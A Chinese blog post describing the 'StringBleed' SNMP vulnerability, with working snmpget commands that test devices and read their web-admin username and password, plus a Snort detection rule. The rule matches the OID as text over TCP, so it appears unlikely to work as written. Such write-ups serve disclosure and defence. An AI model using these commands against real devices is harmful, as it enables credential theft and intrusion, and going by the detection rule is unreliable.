⭐⭐⭐#stringbleed多种使用snmp协议的设备存在泄露凭证风险

原创 sauren  2018-12-25 17:20  阅读 201 views 次 评论 0 条

简单网络管理协议(SNMP),由一组网络管理的标准组成,包含一个应用层协议(application layer protocol)、数据库模型(database schema)和一组资源对象。该协议能够支持网络管理系统,用以监测连接到网络上的设备是否有任何引起管理上关注的情况。该协议多用于网路管理、路由等设备。

该漏洞源于@Capitan Alfa 在其博文中提出。该漏洞组合了之前多个CVE漏洞,使得可以获取到设备的WEB管理端的用户名及密码。

一、影响设备

Github链接 https://github.com/ezelf/sensitivesOids/blob/master/oidpassswordleaks.csv

二、准备工具

本人测试使用Ubutu 16.04,需要先安装snmp。

apt install snmp

按照提示安装即可

三、payload

检测是否存在漏洞:

snmpget -v 1 -c '#Stringbleed' IP iso.3.6.1.2.1.1.1.0

如返回了类似的设备型号说明,即说明可以使用。

检测获取用户名:

snmpget -v 1 -c '#Stringbleed' IP iso.3.6.1.4.1.4491.2.4.1.1.6.1.1.0

如上图,string 返回了用户名

检测获取密码凭证:

snmpget -v 1 -c '#Stringbleed' IP iso.3.6.1.4.1.4491.2.4.1.1.6.1.2.0

密码为空

使用凭证登陆WEB端如下:

测试发现,实际上#Stringbleed可以为空,仍可以获取到正常的返回。

snmpget -v 1 -c '' IP iso.3.6.1.4.1.4491.2.4.1.1.6.1.1.0

四、snort检测规则

tcpdump查看网络流量如下:

检测特征文本4491.2.4.1.1.6.1.1.0即可。

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Snmp Certificate disclosure"; flow: established, to_server; content: "|343439312e322e342e312e312e362e312e312e30|";  sid: 203004; rev: 1; )

修复:

暂时木有,哈哈~

本文地址:https://www.sk15.net/archives/129.html
版权声明:本文为原创文章,版权归 sauren 所有,欢迎分享本文,转载请保留出处!
PREVIOUS:已经是最后一篇了
高性能云服务器特惠

发表评论


表情